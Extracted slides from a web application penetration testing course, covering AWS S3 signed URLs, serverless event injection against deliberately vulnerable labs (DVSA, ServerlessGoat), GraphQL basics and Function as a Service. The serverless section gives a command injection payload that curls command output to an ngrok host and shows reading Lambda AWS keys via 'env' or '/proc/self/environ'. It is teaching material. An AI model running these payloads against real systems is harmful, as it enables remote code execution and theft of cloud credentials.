
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.90


14.5.6 S3 AWS Signed URLs

AWS Signed URLS can be used to


give objects temporary access.
Any user having this URL will be
able to download the object for a
limited time. They are commonly
used by streaming providers.

Create a private bucket and add


some files to it.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.91
14.5.6 S3 AWS Signed URLs

When trying to reach any off these URLs, an


”AccessDenied” error will appear because the bucket has
been set as private.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.92


14.5.6 S3 AWS Signed URLs

Using aws-cli, you should be able to access these objects


once it has been configured via ”aws-cli configure”
command. Files can be copied using “aws-cli cp <S3URI>
<LOCAPATH>”

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.93


14.5.6.1 Creating Signed URLs

Signed URLS can be generated using boto3 library for


python (pip install boto3).

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.94


14.5.6.1 Creating Signed URLs

Visiting the Signed URL shows the object contents.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.95


14.5.6.2 Signed Cookies

Signed URLs gives access to a single file. This method it


does not scale when access to a set of objects is needed.
For this reason Signed cookies can be used to give access
to more than one object at a time.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.96


14.5.7 Serverless Event Injection

Serverless functions listen for events or triggers in order to be


executed. These events can be injected from other trusted
sources in cloud environments leading to a Serverless Event
Injection vulnerability. These trusted sources can be:
• Actions on S3 Objects
• Alerting Systems (Cloudwatch)
• API Gateway Calls
• Changes in the code repository
• Database events
• HTTP APIs
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.97
14.5.7 Serverless Event Injection

Some serverless functions runs shell or eval content with


untrusted input. For instance, imagine a function with the
previous example where the S3 URIs are user controlled.

“os.system(“aws s3 cp {0} {1}”.format(src_object,


dst_object))”

If we are able to control any of these variables a command


injection vulnerability changing the name of the filename.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.98
14.5.7.1 Serverless Event Injection Scenario

Remember that serverless functions live


for a limited time. This is because they
are executed in a small server that lives
for a few minutes, this means regular
vulnerabilities can exist but only for the
time the server is alive.

Visit https://www.serverless-hack.me/ or
install it in your AWS account
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.99
14.5.7.1 Serverless Event Injection Scenario

The application converts Word


doc files to text. It takes an URL
(default one supplied) and
outputs its contents on the
screen.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.100


14.5.7.1 Serverless Event Injection Scenario

The function gets invoked by an AWS API Gateway Call.


We can observe how the command is issued by crashing
the application.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.101


14.5.7.1 Serverless Event Injection Scenario

Observing the API Gateway configuration we can


understand that this endpoint works as a Lambda Proxy,
when the serverless functions receives the event from the
proxy it gets invoked.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.102


14.5.7.1 Serverless Event Injection Scenario

As we have seen the vulnerable code and where the


injection takes place. Try injecting some commands

HINT: use “> /dev/null” after the document URL to receive a


clean output.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.103


14.5.7.1 Serverless Event Injection Scenario

As the server will be


recycled due to its limited
life, there is no point on
trying to backdoor it.
However, lambda functions
store AWS keys in
environment variables. They
could be reached using
“env” or ”cat
/proc/self/environ”
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.104
14.5.7.2 Serverless Event Injection Scenario 2

Let’s go back to the Damn Vulnerable Serverless


Application Installed before in order to discover more
events that can be injected.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.105


14.5.7.2 Serverless Event Injection Scenario 2

Visit the URL and add some


elements to the cart.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.106


14.5.7.2 Serverless Event Injection Scenario 2

Enter random details in the shipping information and


submit them in order to receive the receipt.

If you take a look to the message of the order, it will contain


an S3 bucket with an UUID for the order receipt.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.107


14.5.7.2 Serverless Event Injection Scenario 2

It seems the receipt is being copied from an S3 bucket


folder generated using the receipt’s date and UUID.
This bucket permissions are relatively open, as uploading
files is allowed via:
”echo ”blah” > file.txt && aws s3 cp file.txt
‘s3://<BUCKET>/2020/20/20/whatever’ –acl public-read”

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.108


14.5.7.2 Serverless Event Injection Scenario 2
It has been confirmed that the S3
bucket is open for read/write to
everyone. Let’s check the code in
https://github.com/OWASP/DVSA/bl
ob/master/backend/src/functions/pr
ocessing/send_receipt_email.py

The event handler is reading the


bucket name, key and order, then the
function replaces the extension “.raw”
by “.txt” meaning they expect a raw
S3 Object. Then a download path is
created and recorded into a log file
using “os.system”.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.109
14.5.7.2 Serverless Event Injection Scenario 2

As in the previous example, the


application pass to the os.system
function some content that we
can control as the S3 Bucket
permissions are weak.
Following the name convention
that the function expects a OS
Command injection payload can
be uploaded and executed using
the S3 AWS API.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.110
14.5.7.2 Serverless Event Injection Scenario 2

Ngrok will be used to expose local ports to


the internet and catch a reverse shell for this
exercise. Visit the website
https://ngrok.com and register an account.

After the account has been created


download the ngrok client for your OS and
authorize it following the instructions under
“connect your account”.

Once the account has been set up you can


expose a local port to the internet running
“ngrok http 80” and taking note of the URL.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.111


14.5.7.2 Serverless Event Injection Scenario 2
Requests received to port 80 can be checked on the local web interface
http://127.0.0.1:4040.

Now, using the same naming convention as the function expects, a


payload can be crafted to achieve RCE and receive the response back
to our exposed interface.
Payload: “aws s3 cp empty.txt
‘s3://<your_bucket_id>/2020/20/20/whatever_;curl
XXX.grok.io?data=”$(whoami)”;echo x.raw –acl public-read”
• Whatever_; -> It checks for an underscore in the file name
• Curl something.ngrok.io -> The ngrok endpoint to send the output
• “$(whoami)”; -> The command to run
• Echo x.raw -> Needs to end in .raw to be triggered.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.112
14.5.7.2 Serverless Event Injection Scenario 2

With everything in place go and check the Ngrok web


interface to check that there are some requests.
Commands that return a multiline response will not go
through as they will break the payload. However, they can
be base64 encoded without breaking the lines using “$(ls –
lha | base64 –w0)” in the payload.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.113


14.5.7.2 Serverless Event Injection Scenario 2

Ngrok will now receive the requests that can be decoded to


get the command output.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.114


14.5.7.2 Serverless Event Injection Scenario 2

If you output the env command result, it will include the


AWS keys used by the lambda functions. As a result they
will have the same privileges they are given and used with
the API.

At this point DVSA stack can be deleted from the


CloudFormation AWS Service and the S3 Buckets.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.115


14.5.8 GraphQL APIs
GRAPHQL
• Graphql is a different type of API interface where there is one
endpoint to an API (Instead of many endpoints in REST), and
two types of operations (Query and Mutate) instead of 5 or so
in REST (GET, PUT, POST, PATCH, DELETE).
• Usually example.com/graphql or something similar (Nice idea
of Google dorks).
• REST usually has one endpoint for each type of object (users,
groups, items, books, orders, shipments...etc) with 3 or more
operations on each endpoint
• In graphql, the same endpoint serves all predefined objects
under both Query and Mutation methods.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.116
14.5.8 GraphQL APIs

GRAPHQL TERMS
• Query: A query operation on an object or type.
• Mutate: an update operation on an object, like creating a
new one, updating it fully, updating it partially, or deleting
it.
• Type (objecttype): A type of object, like a class or table,
e.g. Users, Orders, books

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.117


14.5.8 GraphQL APIs

MORE GRAPHQL TERMS


• Schema: Describes the types, fields and actions
available.
• Introspection: A method to learn more about the schema
details like types and fields.
• Resolver: A function that connects schema definitions to
actual backend data sources like SQL tables.
• Scalar Type: Type of data for a field, like string, int or
custom types.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.118
14.5.8 GraphQL APIs

Sample GraphQL query:

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.119


14.5.8 GraphQL APIs

• GraphQL can also be called from the command line using curl.
• Using POST
• Content-type is JSON
• Output is sent to jq for pretty JSON

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.120


14.5.8 GraphQL APIs

Calling a particular object in GraphQL:

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.121


14.5.8 GraphQL APIs

Graphql nesting queries:


• Display each user with his group subscriptions using
graphql, showing the id and name of the group
• Hint: groups {id name}
• Try both the GraphiQL and Curl

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.122


14.5.8 GraphQL APIs

Security in graphql
• Graphql has no built-in understanding of security. It will
return the object as it was requested.
• Without explicit filtering, sensitive data could be exposed
and extracted.
• Can we read user sensitive info such as passwords?

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.123


14.5.8 GraphQL APIs

Making updates in graphql:


• In Graphql, updates (Addition, Creation, Deletion) are
called mutations.
• Let's check the source code
• We have 3 mutations

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.124


14.5.8 GraphQL APIs

Deleteuser mutation
• The deleteUser mutation can be called by:
• Defining the query type to be a mutation
• Selecting the named deleteUser mutation
• Supplying the id to be deleted, and a sub selection for
response (ok field here)

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.125


14.5.9 Function as a Service

Function as a Service (FaaS) is a modern (as of beginning of


2020) type of software architecture. It is implemented in most
common cloud providers like AWS Lambda, Google Cloud
Functions, IBM OpenWhisk or Microsoft Azure Functions.

The FaaS model allows us to execute code in response to events


without maintaning any infrastructure for it (apart from the cloud
account). It allows the user to simply upload modular fragments
of functionalities into the cloud in and they are executed
independently.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.126
14.5.9 Function as a Service

Such solution allows for better scalability, and is a next


level of splitting a monolithic application into functional
pieces.

https://miro.medium.com/max/300/0*Yv6sMLN_7lFjdH3I.png WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.127


14.5.9 Function as a Service

A sample „Hello World” in FaaS (written in Node.js) can look


like below.
/**
* @param {Object} req Cloud Function request context.
* @param {Object} res Cloud Function response context.
*/
exports.helloHttp = function helloHttp (req, res) {
res.send(`Hello ${req.body.name || 'World'}!`);
};

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.128


14.5.9 Function as a Service

Despite being a function, keep in mind that any online


service exchanges and processes data or does any sort of
authentication. This is exactly the same subject to abuse as
any other web or cloud application!

You can experiment more with Serverless software by


downloading and playing with DVFaaS:
https://github.com/we45/DVFaaS-Damn-Vulnerable-
Functions-as-a-Service
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.129
14.5.9 Function as a Service

Each subdirectory of
the project contains
detailed steps to follow
in order deploy as well
as exploit a vulnerable
instance.

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.130


14.5.9 Function as a Service

We encourage you to explore the API and Cloud area, as


there is definitely lots of vulnerabilities in discover in field
of Cloud security!

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.131


References

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.132


References
Cross Origin Resource Sharing
https://www.w3.org/TR/cors/

Calculator Web Service


http://www.dneonline.com/calculator.asmx

Calculator webservice – add


http://www.dneonline.com/calculator.asmx?op=Add

Sample calculator webservice wsdl file


http://www.dneonline.com/calculator.asmx?wsdl

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.133


References
Web Application Description Language
https://www.w3.org/Submission/wadl/

Swagger UI
https://swagger.io/tools/swagger-ui/

Swagger
https://swagger.io/

Web Services Description Language (WSDL) 1.1


https://www.w3.org/TR/wsdl.html

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.134


References
Latest SOAP versions
https://www.w3.org/TR/soap/

Latest Release of SoapUI


https://www.soapui.org/downloads/latest-release.html

Running Adhoc Commands


https://docs.rundeck.com/docs/api/rundeck-api.html#adhoc

AWS – Getting shell access


https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-
7630fa57c7ed

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.135


References
EC2 after IMDSv2
https://blog.appsecco.com/server-side-request-forgery-ssrf-and-aws-ec2-instances-after-
instance-meta-data-service-version-38fc1ba1a28a

Function as a Service
https://medium.com/@BoweiHan/an-introduction-to-serverless-and-faas-functions-as-a-service-
fb5cec0417b2

Damn Vulnerable Function as a Service


https://github.com/we45/DVFaaS-Damn-Vulnerable-Functions-as-a-Service

clarketm/s3recon
https://github.com/clarketm/s3recon

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.136


References
Listing of Amazon S3 Bucket accessible to any amazon
authenticated user (vector-maps-e457472599)
https://hackerone.com/reports/631529

Open AWS S3 bucket leaks all Images uploaded to Zomato chat


https://hackerone.com/reports/507097

Open S3 Bucket WriteAble To Any Aws User


https://hackerone.com/reports/209223

Open s3 bucket allows for public upload


https://hackerone.com/reports/504600

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.137


References
serverless-plugin-warmup
http://github.com/Fidellimited/serverless-plugin-warmup

DVSA
https://github.com/OWASP/DVSA

AWS Lambda
https://aws.amazon.com/lambda

OWASP ServerlessGoat
https://www.serverless-hack.me/

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.138


References
DVSA
https://github.com/OWASP/DVSA/blob/master/backend/src/functions/processing/send_rec
eipt_email.py

Ngrok
https://ngrok.com/

WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.139


Labs
Null Origin Exploitation
There is a sample website that holds a secret token. Your task is to
prepare an exploit that takes advantage of a CORS configuration on
secret.php and, once opened in another tab, access and send the secret
information to another place in the same way an XSS can steal a cookie.

*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your
members area and click the labs drop-down in the appropriate module line or to the virtual labs
tabs on the left navigation. To UPGRADE, click LINK.
WAPTXv2: Section 01, Module 14 - Caendra Inc. © 2020 | p.140

You might also like